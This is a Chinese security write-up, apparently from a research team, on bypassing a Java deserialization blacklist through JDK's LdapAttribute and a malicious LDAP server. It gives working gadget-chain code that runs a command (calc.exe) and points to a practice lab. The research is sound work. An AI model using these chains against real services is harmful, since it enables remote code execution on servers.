原创 Y4Sec Team 2023-09-10 13:28 浙江
当TemplatesImpl被resolveClass拉黑时,如何使用JDK 中的类绕过黑名单
一次挖洞过程中,遇到了 TemplatesImpl resolveClass 黑名单,后来想起 RWCTF 中的一道题目,成功绕过该黑名单。于是和大家分享这个思路,并编写了对应的环境和靶机,希望大家可以有所收获
这个黑名单内容如下
private static final List<Object> BLACKLIST = Arrays.asList("java.security.SignedObject","com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet","com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter");
可以看到 SignedObject 也加入了黑名单中,在先知中已有文章说明如果通过 SignedObject#getObject 方法进行二次反序列化
0x01 分析
TemplatesImpl 链是一般调用栈如下
getOutputPropertiesnewTransformergetTransletInstancedefineTransletClassesdefineClass
调用 getter 后最终调用 defineClass 加载了反射设置的 _bytecodes
最常见的两个链,底层都是TemplateImpl
(1)CB 链 - 最新版的 CB 链仍然能够利用,实战价值较大
(2)Jackson 链 - 能打 SpringBoot 默认原生反序列化的链
以 CB 链为例,调用 getOutputProperties 方法的过程如下:BeanComparator 类 compare 方法调用已设置属性的 getter 方法,当对象位 TemplateImpl 且属性是 outputProperties 时完成整个链
getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)// ...getSimpleProperty:1279, PropertyUtilsBean (org.apache.commons.beanutils)getNestedProperty:809, PropertyUtilsBean (org.apache.commons.beanutils)getProperty:885, PropertyUtilsBean (org.apache.commons.beanutils)getProperty:464, PropertyUtils (org.apache.commons.beanutils)compare:163, BeanComparator (org.apache.commons.beanutils)
不难看出,这里只要是一个 getter 触发点即可
BeanComparator#compare -> AnyObject#getAny-> RCE
再来看 Jackson POJONode 原生链
getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)// ...serialize:115, POJONode (com.fasterxml.jackson.databind.node)// ...writeValueAsString:1140, ObjectWriter (com.fasterxml.jackson.databind)// ...nodeToString:34, InternalNodeMapper (com.fasterxml.jackson.databind.node)toString:68, BaseJsonNode (com.fasterxml.jackson.databind.node)readObject:86, BadAttributeValueExpException (javax.management)
POJONode 父类 BaseJsonNode 包含 toString 方法,通过 Bad...Exception 触发。在 Jackson 中把对象序列化到 JSON 字符串的方法是 ObjectMapper#writeValueAsString
在 POJONode 的 serialize 方法中,如果目标类型不是 JsonSerializable 将会进入 defaultSerializaValue 方法
最终在 BeanSerializerBase#serializeFields 中遍历所有属性,反射调用其 getter 方法
可以看出,无论 CB 还是 Jackson 原生链,底层逻辑一致:寻找一个可以导致 RCE 的 getter 方法和类即可
0x02 寻找类
寻找一个可以导致 RCE 的 getter 方法和类
能想到比较有可能思路大概有:getConnection -> ctx.lookup -> JNDI
遗憾这种思路可能存在于第三方库中,在 JDK 中找不到符合的
在 RWCTF 中,出题师傅发现 com.sun.jndi.ldap.LdapAttribute 类存在 getter 可以导致 JNDI 注入,这个类从低版本 JDK 到 8 都适用
该类中存在两处 getter 可以调用传统的 ctx.lookup 方法
然而这两个方法的 lookup 内容并不完全可控,因此无法利用
这里利用的是 java.naming.provider.url 属性,通过 getBaseCtx 方法设置 JNDI 的环境属性,再通过 getAttributeDefinition 调用 c_lookup
而漏洞的出发点,还在 getAttributeDefinition 方法中,但不再是 lookup 方法,而是 getBaseCtx 后通过 getSchema 触发
在 LdapCtxFactory 的 getInitialContext 方法中,读取了 JDNI Env 设置的 java.naming.provider.url 属性
在getUsingURLs 方法,一步步进入 LdapCtx 构造方法,通过 socket 与原创 LDAP 服务端建立了连接
在 getSchema 方法时,可以进入 LdapCtx#c_lookup 方法
c_lookup:1017, LdapCtx (com.sun.jndi.ldap)c_resolveIntermediate_nns:168, ComponentContext (com.sun.jndi.toolkit.ctx)c_resolveIntermediate_nns:359, AtomicContext (com.sun.jndi.toolkit.ctx)p_resolveIntermediate:397, ComponentContext (com.sun.jndi.toolkit.ctx)p_getSchema:432, ComponentDirContext (com.sun.jndi.toolkit.ctx)getSchema:422, PartialCompositeDirContext (com.sun.jndi.toolkit.ctx)getSchema:210, InitialDirContext (javax.naming.directory)getAttributeDefinition:207, LdapAttribute (com.sun.jndi.ldap)
当 LDAP Server 返回的 javaClassName 不为空时进入 decodeObject
当 javaSerializedData 数据不为空时,进入反序列化对象的方法
最终可以再次触发反序列化
另外,普通的 ctx.lookup 触发的点也是 c_lookup(调用栈如下)
c_lookup:1017, LdapCtx (com.sun.jndi.ldap)p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)lookup:94, ldapURLContext (com.sun.jndi.url.ldap)lookup:417, InitialContext (javax.naming)
总结:LdapAttribute 这条链如下
LdapAttribute # getAttributeDefinitionthis.getBaseCtx()LdapAttribute # getBaseCtxthis.baseCtxEnv.put("java.naming.provider.url", this.baseCtxURL);this.baseCtx = new InitialDirContext(this.baseCtxEnv);LdapAttribute # getAttributeDefinitionbaseCtx.getSchema(this.rdn)LdapCtx # c_lookupObj # deserializeObject
该绕过不仅可以在低版本 JDK 复现,在高版本 JDK 中也适用
在复现之前,存在最后一个问题,为什么可以绕过黑名单
resolveClass 方法的作用是根据类的名称获取对应的 Class 对象,并通过类加载器加载该类。重写 resolveClass 方法的作用范围是使用了该 ObjectInputStream 类进行 readObject 操作时。不会影响到其他 ObjectInputStream 的 readObject 操作
简单来说,外层的黑名单不负责内部 readObject 操作的安全
new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray())) {protected Class<?> resolveClass(ObjectStreamClass desc)throws IOException, ClassNotFoundException {System.out.println(desc.getName());return super.resolveClass(desc);}}.readObject();
一次反序列化经过 resolveClass 的所有类如下
javax.management.BadAttributeValueExpExceptionjava.lang.Exceptionjava.lang.Throwable[Ljava.lang.StackTraceElement;java.lang.StackTraceElementjava.util.Collections$UnmodifiableListjava.util.Collections$UnmodifiableCollectionjava.util.ArrayListcom.fasterxml.jackson.databind.node.POJONodecom.fasterxml.jackson.databind.node.ValueNodecom.fasterxml.jackson.databind.node.BaseJsonNodecom.sun.jndi.ldap.LdapAttributejavax.naming.directory.BasicAttributejavax.naming.CompositeName
如果想要复现这个绕过,我们需要自行写一个 LdapServer
public class LDAPServer {private static final String LDAP_BASE = "dc=example,dc=com";public static void main(String[] args) {int port = 1389;try {InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);config.setListenerConfigs(new InMemoryListenerConfig("listen",InetAddress.getByName("0.0.0.0"),port,ServerSocketFactory.getDefault(),SocketFactory.getDefault(),(SSLSocketFactory) SSLSocketFactory.getDefault()));config.addInMemoryOperationInterceptor(new OperationInterceptor());InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);System.out.println("Listening on 0.0.0.0:" + port);ds.startListening();} catch (Exception e) {e.printStackTrace();}}private static class OperationInterceptor extends InMemoryOperationInterceptor {@Overridepublic void processSearchResult(InMemoryInterceptedSearchResult result) {String base = result.getRequest().getBaseDN();Entry entry = new Entry(base);entry.addAttribute("javaClassName", "Y4Sec");try {entry.addAttribute("javaSerializedData", JacksonTemplatePayload.getData());result.sendSearchEntry(entry);result.setResult(new LDAPResult(0, ResultCode.SUCCESS));System.out.println("Send javaSerializedData");} catch (Exception e) {e.printStackTrace();}}}}
构建链的部分代码,替换了 getter 部分即可
public static void main(String[] args) throws Exception {CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");ctClass.removeMethod(writeReplace);ctClass.toClass();POJONode node = new POJONode(getGadgetObj());BadAttributeValueExpException val = new BadAttributeValueExpException(null);Field valfield = val.getClass().getDeclaredField("val");valfield.setAccessible(true);valfield.set(val, node);ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);oos.writeObject(val);System.out.println(new String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray())));}public static BasicAttribute getGadgetObj() {try {Class clazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");Constructor clazz_cons = clazz.getDeclaredConstructor(new Class[]{String.class});clazz_cons.setAccessible(true);BasicAttribute la = (BasicAttribute) clazz_cons.newInstance(new Object[]{"exp"});Field bcu_fi = clazz.getDeclaredField("baseCtxURL");bcu_fi.setAccessible(true);bcu_fi.set(la, "ldap://127.0.0.1:1389/");CompositeName cn = new CompositeName();cn.add("a");cn.add("b");Field rdn_fi = clazz.getDeclaredField("rdn");rdn_fi.setAccessible(true);rdn_fi.set(la, cn);return la;} catch (Exception e) {e.printStackTrace();}return null;}
在 LdapServer 中使用正常的 Jackson TemplatesImpl Gadget
该例子中 SignedObject 已经拉黑,该类也可以结合 POJONode 来利用(如果目标拉黑 TemplatesImpl 但是没拉黑 SignedObject 适用)
public static void main(String[] args) throws Exception {List<Object> list = new ArrayList<>();ClassPool pool = ClassPool.getDefault();CtClass ctClass = pool.makeClass("a");CtClass superClass = pool.get(AbstractTranslet.class.getName());ctClass.setSuperclass(superClass);CtConstructor constructor = new CtConstructor(new CtClass[]{}, ctClass);constructor.setBody("Runtime.getRuntime().exec(\"calc.exe\");");ctClass.addConstructor(constructor);byte[] bytes = ctClass.toBytecode();TemplatesImpl templatesImpl = new TemplatesImpl();setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});setFieldValue(templatesImpl, "_name", "y4sec");setFieldValue(templatesImpl, "_tfactory", null);ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");ctClass.removeMethod(writeReplace);ctClass.toClass();POJONode jsonNodes = new POJONode(templatesImpl);BadAttributeValueExpException exp = new BadAttributeValueExpException(null);Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");val.setAccessible(true);val.set(exp, jsonNodes);list.add(exp);KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");kpg.initialize(1024);KeyPair kp = kpg.generateKeyPair();SignedObject signedObject = new SignedObject((Serializable) list, kp.getPrivate(),Signature.getInstance("DSA"));POJONode jsonNodes1 = new POJONode(signedObject);BadAttributeValueExpException exp1 = new BadAttributeValueExpException(null);val.set(exp1, jsonNodes1);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);objectOutputStream.writeObject(exp1);FileOutputStream fout = new FileOutputStream("1.ser");fout.write(barr.toByteArray());fout.close();System.out.println(serial(exp1));}
对于这个问题,我编写了一个靶场,包含了一个 SpringBoot 应用,生成 Gadget 类和 LdapServer 辅助类
完整代码位于
https://github.com/Y4Sec-Team/no-templates
启动 NoTemplatesApplication 应用,使用 JacksonTemplatePayload 类生成普通 TemplatesImpl 链测试,报错该类位于黑名单
使用 SignedObject 二次反序列化绕黑名单同样报错
启动 LdapServer 后使用 JacksonLdapAttrPayload 生成 Payload 测试
成功弹出计算器
